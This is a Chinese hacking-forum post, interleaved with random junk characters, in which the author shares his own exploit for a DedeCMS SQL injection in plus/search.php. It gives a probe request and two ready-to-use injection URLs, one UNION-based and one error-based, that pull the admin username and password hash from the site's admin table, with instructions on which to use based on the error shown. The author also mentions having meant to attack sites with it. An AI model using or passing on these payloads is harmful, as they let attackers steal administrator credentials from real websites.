转载不加作者名的没JJ3 H/ `3 G" l* H
. f$ ~( f6 E; n3 ^
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' ]* K9 u' _% Q1 k& f7 r& |! z3 c* S+ f7 V
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; \8 d0 |( @ q0 Z1 G4 K. Y+ N% P5 O7 ~; G5 `( \3 g' R
我一般是这样测试的:# ?% j$ X1 S$ j/ r
! Y6 P ]1 g4 n" r3 P' z1 S# e8 x提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a s" z3 U1 W0 Q$ X- C! p1 {1 Y# I2 \
7 J; x( e. I" K2 R% x" h/ T5 N( S0 z转载不加作者名的没JJ
6 z% M; H$ `! {1 K
4 P5 w# Z, E4 E! `, [1 k作者:鬼哥
1 A; \) a& L5 T9 a" y& H+ b/ I6 X' v$ U+ K. Q& K
' U7 Q) k5 W. U0 G' M. L) x, m: [( j S, W4 ?( z- L L
看结果如果提示
: S* |/ Y% l& z, J7 x
! R+ c" x' _. X/ R$ _% KSafe Alert: Request Error step 2 !1 A! y0 W/ a ^+ _
0 {7 D" h- \- o0 F5 A$ e
那么直接用下面的exp% [. P8 v9 s9 P# |2 A8 c7 ]- ]( [
/ z: Z! `, N& u( Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a# G6 w9 Y: {6 R) J5 i( w2 |4 L+ g
9 {# @$ `9 C* R! S m+ X8 K/ V+ P( k- y- \4 p S' _
看结果如果提示: N5 i+ X' X5 e: i- `
. d8 {& D7 V7 W0 V) vSafe Alert: Request Error step 1 !: Y; H7 b: m& q8 u7 O: @; a
k) w* @: A1 c* l$ a0 _那么直接用下面的exp2 p4 ~( D& ?# \6 u2 o
) R9 O* l4 _9 w+ H8 L. L! ?2 H$ A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a3 J) b* v4 ?# f1 n
6 z# O# x$ v: k1 S ~
( v- ?1 T& p: `% d4 z如果正常显示证明漏洞不存在了。) q2 L3 E! r4 X4 M0 W
- G4 M" }+ r) Z, n( m' u
转载不加作者名的没JJ |